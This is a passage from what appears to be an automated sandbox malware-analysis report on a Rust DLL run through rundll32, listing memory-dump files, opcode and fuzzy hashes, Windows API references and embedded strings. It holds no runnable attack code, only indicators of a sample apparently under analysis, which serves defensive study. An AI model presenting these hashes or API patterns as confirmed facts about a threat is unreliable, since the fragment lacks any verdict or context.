                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 520d09fb6862783d9bc66d8313f406b90f45e243b416ef1e995fe84f41f9c88d
                        • Instruction ID: 94b8e6ed0aeea176729ef601105a5e61881d381717d03b51a97b53541034e11a
                        • Opcode Fuzzy Hash: 520d09fb6862783d9bc66d8313f406b90f45e243b416ef1e995fe84f41f9c88d
                        • Instruction Fuzzy Hash: A571EF76F087159BD308DE65C89035FF7E2EBC8710F1AC83DA899D7784DA7498419B82
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9e5e75635102fd5c4cae7f7c8f902134db88453d4cb4e5063b7c947140e59f36
                        • Instruction ID: 7b0bab0a2728e2e788ad4114dedfed26ace73fcb77e3535435a44fc7bb85f1b5
                        • Opcode Fuzzy Hash: 9e5e75635102fd5c4cae7f7c8f902134db88453d4cb4e5063b7c947140e59f36
                        • Instruction Fuzzy Hash: 5F5170B2F083194BE318EEB5D89035BF2D2EBC8710F0AC93DA999D7784E9B59C4456C1
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 99828d06bc808f93db10b0e30e0ebd7fc51d953f3c179bb59066ef1b3e1433ce
                        • Instruction ID: ad06918a11f4e13099abac7b380a127f5e870e09815a6dd8ce93ce2fde514453
                        • Opcode Fuzzy Hash: 99828d06bc808f93db10b0e30e0ebd7fc51d953f3c179bb59066ef1b3e1433ce
                        • Instruction Fuzzy Hash: 20514D72E08B149BD318DE6AC89035FF3E2EFC8310F1AC93DE8D997654C675A8419B81
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 50ca7786af505535b93f7ebbf5f372ed01d22d6b6347e7d5886ace9d1d2504c9
                        • Instruction ID: 495b380decf1c941d47f5d722d62fbfbf032c4773202c2321501a1f1511f8f8d
                        • Opcode Fuzzy Hash: 50ca7786af505535b93f7ebbf5f372ed01d22d6b6347e7d5886ace9d1d2504c9
                        • Instruction Fuzzy Hash: E5516371B0931C4FE308ADB5DD903AFF2D2E7C8710F0A883DA999C7784E9B9994566C1
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 97c76fc4d81efcb39dec3207b4a4b37bcf4a361830466e7e062f4cc4ad3e4a54
                        • Instruction ID: bacaf9beb700ad22f651e41332c45ac567d7edfb42a621cfd7af8bb4bb09fa8d
                        • Opcode Fuzzy Hash: 97c76fc4d81efcb39dec3207b4a4b37bcf4a361830466e7e062f4cc4ad3e4a54
                        • Instruction Fuzzy Hash: E941BC717083459FD314DF29C880B1AB7E2AF84704F18CA7DE9A98BB41F772D8508B91
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4578bf7dd7a27a99be1329181586de24e9d242d57d4295e2626a1427b3ab9f8a
                        • Instruction ID: 44c97af10734db442fc5fc85577ed8657a16f6535cf7dbeee0d30882847229ee
                        • Opcode Fuzzy Hash: 4578bf7dd7a27a99be1329181586de24e9d242d57d4295e2626a1427b3ab9f8a
                        • Instruction Fuzzy Hash: 2E41BD367092558FC718DF28C88095EFBE6EBC8310F49452DE989D7B90EA30ED158B86
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eb5f149559df01870d98d5e9657b75206c6bec5c6f44af08782f05dc6f8a30fd
                        • Instruction ID: 64dd6185b2c49e817a2bd399398765e62515ea3247635f557b012fe0e399b82c
                        • Opcode Fuzzy Hash: eb5f149559df01870d98d5e9657b75206c6bec5c6f44af08782f05dc6f8a30fd
                        • Instruction Fuzzy Hash: D3318AB1A047479F8314CFA5D08044AFBA1BF88758B24C66ED9689F712D770ED82CBD1
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: edc4726fabed8a1e9b3db10a541256135cecd8b7511b7ad6c67f1d0fe2f29e8c
                        • Instruction ID: 5dd4e581c34df935605ab4aaad887ba755f49ff5a84ac5c143591831ad638eca
                        • Opcode Fuzzy Hash: edc4726fabed8a1e9b3db10a541256135cecd8b7511b7ad6c67f1d0fe2f29e8c
                        • Instruction Fuzzy Hash: D6213833B003245BCB15C978C8812A6B3D6DBC5664F168325DD75AF6D2EB319C8F86C0
                        APIs
                        • SetLastError.KERNEL32(00000000), ref: 6CBF0227
                        • GetCurrentDirectoryW.KERNEL32(00000000,00000002), ref: 6CBF0232
                        • GetLastError.KERNEL32 ref: 6CBF023E
                        • GetCurrentProcess.KERNEL32 ref: 6CBF046B
                        • GetCurrentThread.KERNEL32 ref: 6CBF0473
                        • memset.VCRUNTIME140(?,00000000,000002D0), ref: 6CBF048A
                        • RtlCaptureContext.KERNEL32(?), ref: 6CBF0493
                          • Part of subcall function 6CBEC9B0: WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000), ref: 6CBEC9F0
                          • Part of subcall function 6CBEC9B0: LoadLibraryA.KERNEL32(dbghelp.dll), ref: 6CBECA04
                          • Part of subcall function 6CBEC9B0: GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 6CBECA36
                          • Part of subcall function 6CBEC9B0: GetProcAddress.KERNEL32(SymSetOptions), ref: 6CBECA64
                          • Part of subcall function 6CBEC9B0: GetProcAddress.KERNEL32(SymInitializeW), ref: 6CBECA93
                          • Part of subcall function 6CBEC9B0: GetCurrentProcess.KERNEL32 ref: 6CBECAB1
                          • Part of subcall function 6CBEC9B0: memset.VCRUNTIME140(00000000,00000000,000007FE), ref: 6CBECB04
                        • GetProcAddress.KERNEL32(SymFunctionTableAccess64), ref: 6CBF04C9
                        • GetProcAddress.KERNEL32(SymGetModuleBase64), ref: 6CBF04F2
                        • GetCurrentProcess.KERNEL32(SymGetModuleBase64), ref: 6CBF0506
                        • GetProcAddress.KERNEL32(StackWalkEx), ref: 6CBF0528
                        • memset.VCRUNTIME140(?,00000000,00000100), ref: 6CBF054B
                        • ReleaseMutex.KERNEL32(?), ref: 6CBF0651
                        • memset.VCRUNTIME140(?,00000000,00000100,StackWalkEx), ref: 6CBF06DD
                        • GetProcAddress.KERNEL32(StackWalk64), ref: 6CBF0784
                        • GetLastError.KERNEL32 ref: 6CBF0253
                          • Part of subcall function 6CB65AD0: RtlFreeHeap.NTDLL(00000000,?,6CBE7E44), ref: 6CB65AE1
                        Strings
                        • SymGetModuleBase64, xrefs: 6CBF04E7
                        • stack backtrace:, xrefs: 6CBF03F0
                        • StackWalkEx, xrefs: 6CBF051D
                        • note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...], xrefs: 6CBF0678
                        • internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs, xrefs: 6CBF0808
                        • StackWalk64, xrefs: 6CBF0779
                        • SymFunctionTableAccess64, xrefs: 6CBF04BE
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: AddressProc$Current$memset$ErrorLastProcess$CaptureContextDirectoryFreeHeapLibraryLoadMutexObjectReleaseSingleThreadWait
                        • String ID: StackWalk64$StackWalkEx$SymFunctionTableAccess64$SymGetModuleBase64$internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs$note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...]$stack backtrace:
                        • API String ID: 3073563537-3001507533
                        • Opcode ID: d43587c4eefa0dbfdd625d8f1c20cc47014c222f6479610eef6cc36f72e622c5
                        • Instruction ID: db3522c98586501f7f5dcc17969f971463f3d44847e591d0c72c93c8cbaad467
                        • Opcode Fuzzy Hash: d43587c4eefa0dbfdd625d8f1c20cc47014c222f6479610eef6cc36f72e622c5
                        • Instruction Fuzzy Hash: 642245B0604B808FE3618F25C994793BBF5BF49308F104A1DD8EA87B91EB75B54ACB51
                        APIs
                        • memmove.VCRUNTIME140(?,?,000000B4), ref: 6CBD87FA
                          • Part of subcall function 6CBE6A27: memmove.VCRUNTIME140(?,00000000,?,?,?,6CBD8843), ref: 6CBE6A5D
                        • memmove.VCRUNTIME140(?,?,000000C0), ref: 6CBD8955
                        • memmove.VCRUNTIME140(?,?,000000B4), ref: 6CBD8C1C
                          • Part of subcall function 6CBE738F: CertDuplicateCertificateContext.CRYPT32(?), ref: 6CBE7390
                        • memmove.VCRUNTIME140(?,?,000000C0), ref: 6CBD8A75
                        • FreeContextBuffer.SECUR32(?), ref: 6CBD8AB0
                        • memmove.VCRUNTIME140(?,?,000000C0), ref: 6CBD8B32
                          • Part of subcall function 6CBE72E6: CertDuplicateStore.CRYPT32(?), ref: 6CBE72E7
                          • Part of subcall function 6CBD5A78: memmove.VCRUNTIME140(?,?,00000160,?,?,?,00000000,?,6CBD8BE8), ref: 6CBD5AA7
                        • memmove.VCRUNTIME140(?,?,0000009C), ref: 6CBD8C39
                        • memmove.VCRUNTIME140(?,?,000000B4), ref: 6CBD8C9A
                        • memmove.VCRUNTIME140(?,?,0000009C), ref: 6CBD8CB8
                        • memmove.VCRUNTIME140(?,?,000000B4), ref: 6CBD8CE7
                        • memmove.VCRUNTIME140(?,?,0000009C), ref: 6CBD8D04
                        • memmove.VCRUNTIME140(?,?,000000B4), ref: 6CBD8D2E
                        • memmove.VCRUNTIME140(?,?,0000009C), ref: 6CBD8D4C
                        • memmove.VCRUNTIME140(?,?,000000B4), ref: 6CBD8D7B
                        • memmove.VCRUNTIME140(?,?,0000009C), ref: 6CBD8D98
                        Strings
                        • future polled after completionD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-native-tls-0.3.1\src\lib.rs, xrefs: 6CBD8DB5
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove$CertContextDuplicate$BufferCertificateFreeStore
                        • String ID: future polled after completionD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-native-tls-0.3.1\src\lib.rs
                        • API String ID: 3250603675-1242699868
                        • Opcode ID: 887db2d703b551a230e607f0f4633c71f28cd52066e0595fd30ecad97281c919
                        • Instruction ID: a4204fe2cdc1e0018e7fc82386f293d6c2f8751f0579c98d9e009df68b4ecfa2
                        • Opcode Fuzzy Hash: 887db2d703b551a230e607f0f4633c71f28cd52066e0595fd30ecad97281c919
                        • Instruction Fuzzy Hash: 70027DB1908381DFD754CF24C484B9ABBE4FF88315F04895EE8888B745E775E949CB92
                        APIs
                        • GetModuleHandleA.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,?,6CB96DA6,?,?,?,?,?,?,6CC03E7A), ref: 6CC0405E
                        • GetProcAddress.KERNEL32(00000000,WaitOnAddress), ref: 6CC04070
                        • GetProcAddress.KERNEL32(00000000,WakeByAddressSingle), ref: 6CC04081
                        • GetModuleHandleA.KERNEL32(ntdll.dll,?,?,?,?,?,6CB96DA6,?,?,?,?,?,?,6CC03E7A), ref: 6CC04095
                        • GetProcAddress.KERNEL32(00000000,NtCreateKeyedEvent), ref: 6CC040AB
                        • GetProcAddress.KERNEL32(00000000,NtReleaseKeyedEvent), ref: 6CC040C0
                        • GetProcAddress.KERNEL32(00000000,NtWaitForKeyedEvent), ref: 6CC040D1
                        • CloseHandle.KERNEL32(?,?,C0000000,00000000,00000000,00000000,NtWaitForKeyedEvent,00000000,NtReleaseKeyedEvent,?,?,?,?,?,6CB96DA6), ref: 6CC04124
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: AddressProc$Handle$Module$Close
                        • String ID: NtCreateKeyedEvent$NtReleaseKeyedEvent$NtWaitForKeyedEvent$WaitOnAddress$WakeByAddressSingle$api-ms-win-core-synch-l1-2-0.dll$ntdll.dll
                        • API String ID: 3875313662-3409541999
                        • Opcode ID: 4c80171e6f670636bcba504ea96d7c796500e8ae1127825990c57f004ff816a6
                        • Instruction ID: 69b5ce56d6ddd160577e47d010dfe196d4241f255799f958bc9bab419bcca7fc
                        • Opcode Fuzzy Hash: 4c80171e6f670636bcba504ea96d7c796500e8ae1127825990c57f004ff816a6
                        • Instruction Fuzzy Hash: C051F4717412209BEB118F26CC44B1776E4AFA536CF294128EA25DFA92FB73CC52C794
                        APIs
                        • GetCurrentProcess.KERNEL32 ref: 6CBF09F5
                        • GetProcAddress.KERNEL32(SymFromInlineContextW), ref: 6CBF0A15
                        • GetProcAddress.KERNEL32(SymGetLineFromInlineContextW), ref: 6CBF0A44
                        • GetProcAddress.KERNEL32(SymAddrIncludeInlineTrace), ref: 6CBF0A8D
                        • GetProcAddress.KERNEL32(SymQueryInlineTrace), ref: 6CBF0AB8
                        • memset.VCRUNTIME140(?,00000000,00000FF4), ref: 6CBF0C41
                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000007CF,00000000,00000100,00000000,00000000), ref: 6CBF0D46
                        Strings
                        • SymFromInlineContextW, xrefs: 6CBF0A0A
                        • __rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...], xrefs: 6CBF10AE
                        • SymAddrIncludeInlineTrace, xrefs: 6CBF0A82
                        • SymQueryInlineTrace, xrefs: 6CBF0AAD
                        • SymGetLineFromInlineContextW, xrefs: 6CBF0A39
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: AddressProc$ByteCharCurrentMultiProcessWidememset
                        • String ID: SymAddrIncludeInlineTrace$SymFromInlineContextW$SymGetLineFromInlineContextW$SymQueryInlineTrace$__rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...]
                        • API String ID: 3228588488-600644135
                        • Opcode ID: 245e5309d1a1954a51d16815a3daa8dbb295954d8a66fd9a6672e0d9d4bf6ab6
                        • Instruction ID: 5da6b16dc2e7ba4b5752a622db3db8b2bf8df99abd0bcc000be374a1151d641c
                        • Opcode Fuzzy Hash: 245e5309d1a1954a51d16815a3daa8dbb295954d8a66fd9a6672e0d9d4bf6ab6
                        • Instruction Fuzzy Hash: FD32E571900B808BE721CF25C985BA2B7F5FF99308F108A1DD9EA97B61D771B489CB50
                        APIs
                        • memmove.VCRUNTIME140(?,?,000000BC), ref: 6CBDEDCD
                        • memmove.VCRUNTIME140(000000C4,?,0000009C), ref: 6CBDEDED
                          • Part of subcall function 6CBD5A78: memmove.VCRUNTIME140(?,?,00000160,?,?,?,00000000,?,6CBD8BE8), ref: 6CBD5AA7
                        • memmove.VCRUNTIME140(?,?,000000B4), ref: 6CBDEE59
                        • memmove.VCRUNTIME140(?,?,0000009C), ref: 6CBDEE76
                        • memmove.VCRUNTIME140(?,?,000000B4), ref: 6CBDEEA9
                        • memmove.VCRUNTIME140(?,?,0000009C), ref: 6CBDEEC7
                        • memmove.VCRUNTIME140(?,?,000000B4), ref: 6CBDEEEA
                        • memmove.VCRUNTIME140(?,?,0000009C), ref: 6CBDEF0E
                        Strings
                        • future polled after completionD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-native-tls-0.3.1\src\lib.rs, xrefs: 6CBDEFB1
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID: future polled after completionD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-native-tls-0.3.1\src\lib.rs
                        • API String ID: 2162964266-1242699868
                        • Opcode ID: e927299a1009ffc4687d4fe61751048c7c282e49961e304d0583ddc6afa39f35
                        • Instruction ID: 733f2be3c9cdd290be172390d032fe3f2e13b73a8f3d621a20481069626b8c73
                        • Opcode Fuzzy Hash: e927299a1009ffc4687d4fe61751048c7c282e49961e304d0583ddc6afa39f35
                        • Instruction Fuzzy Hash: E75150B2A04345ABE725CB54D881FEBF7A8FB84304F04852DE55987780F735E918CB92
                        APIs
                        • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CBADE84
                        • memmove.VCRUNTIME140(?,?,00000220), ref: 6CBADE9D
                        • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CBADF0C
                        • memmove.VCRUNTIME140(?,?,000000C8), ref: 6CBADF21
                        • memmove.VCRUNTIME140(?,?,00000168), ref: 6CBADF6D
                        • memmove.VCRUNTIME140(?,?,00000154), ref: 6CBAEA27
                        Strings
                        • HTTP/1.1 200HTTP/1.0 200HTTP/1.1 407unsuccessful tunnelproxy authentication requiredproxy headers too long for tunnel, xrefs: 6CBAEBB6
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID: HTTP/1.1 200HTTP/1.0 200HTTP/1.1 407unsuccessful tunnelproxy authentication requiredproxy headers too long for tunnel
                        • API String ID: 2162964266-2977587669
                        • Opcode ID: 0ed372f5a41f1bcd5742da32c5fb1aec4167dc30ed577e4cbfd2e3e2353e10f8
                        • Instruction ID: 56dfd39411579a47148686652c7f18fa60b53ee77d24e34c65bc8f6d94a0a13e
                        • Opcode Fuzzy Hash: 0ed372f5a41f1bcd5742da32c5fb1aec4167dc30ed577e4cbfd2e3e2353e10f8
                        • Instruction Fuzzy Hash: 05F1CB74608781AFD715CF64C898ADEB7E1FF84308F04856DE89D4B391DB31A95ACB82
                        APIs
                        • SetLastError.KERNEL32(00000000), ref: 6CB95C18
                        • GetFinalPathNameByHandleW.KERNEL32(?,?,00000000,00000000), ref: 6CB95C25
                        • GetLastError.KERNEL32 ref: 6CB95C31
                        • GetLastError.KERNEL32 ref: 6CB95C42
                          • Part of subcall function 6CB65AD0: RtlFreeHeap.NTDLL(00000000,?,6CBE7E44), ref: 6CB65AE1
                        Strings
                        • Filepathfatal runtime error: I/O error: operation failed to complete synchronously, xrefs: 6CB95B6B
                        • internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs, xrefs: 6CB95D90
                        • handlepanicked at :std\src\path.rs, xrefs: 6CB95B7C
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: ErrorLast$FinalFreeHandleHeapNamePath
                        • String ID: Filepathfatal runtime error: I/O error: operation failed to complete synchronously$handlepanicked at :std\src\path.rs$internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs
                        • API String ID: 620083245-143123693
                        • Opcode ID: 741dfdd965fd118f74367b49e3eb1cc87f19db02c16963e03c472ec4f8781387
                        • Instruction ID: bbf5c36d5b5678060926bb6cd3877ae5e09500e4492738d48d390998f60cb445
                        • Opcode Fuzzy Hash: 741dfdd965fd118f74367b49e3eb1cc87f19db02c16963e03c472ec4f8781387
                        • Instruction Fuzzy Hash: BD813575E012588FDB10CF94D884BEDBBB0FF49328F248169E804BB791D7749889CB69
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: __aulldiv$ErrorLastPerformanceQuery$CounterFrequency
                        • String ID: called `Result::unwrap()` on an `Err` value
                        • API String ID: 10619572-2333694755
                        • Opcode ID: ed6c998ab337222b0943c2fd034c67ce8c3e7059df546ee3278538acae9109fd
                        • Instruction ID: 7d3906e9fb220f9e47e2c408fcd3883aab9f8f864dbb96a91599d48b07d79fea
